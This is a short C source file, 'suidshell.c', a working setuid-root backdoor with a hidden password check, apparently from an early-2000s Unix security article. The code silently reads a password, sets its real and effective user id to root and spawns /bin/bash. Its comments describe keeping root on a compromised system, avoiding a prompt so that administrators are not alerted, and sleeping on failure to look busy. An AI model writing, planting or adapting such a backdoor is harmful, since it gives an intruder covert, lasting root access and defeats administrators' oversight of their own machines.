|
(view this code in a separate window) /* * suidshell.c * * Compile with * gcc -o suidshell suidshell.c -lcrypt * * Install setuserid root, run, and viola. * Not terribly impressive, and guarenteed to * be noticed by any sysadmin worth her salt. * * Copyright 2001, Bri Hatch * Released under the GPL. # */ #include <stdio.h> #include <unistd.h> #define _XOPEN_SOURCE int main() { char passwd[BUFSIZ]; char encrypted[] = "00frf5lpj6212"; /* Let's require that folks supply a password, just * to be sure any other users on this system can't * use this shell on their own. Last thing a hacker * needs on a compromised system is another hacker * goofing things up. No, we don't prompt for it - * that'd set off an administrator for sure... */ system("/bin/stty -echo"); read(0, passwd, BUFSIZ-1); system("/bin/stty echo"); if ( strcmp( crypt(passwd, encrypted), encrypted) == 0 ) { setreuid(0,0); /* make real and effective userid root */ system("/bin/bash"); } else { sleep(200); /* make it look like we're doing something... */ } }
|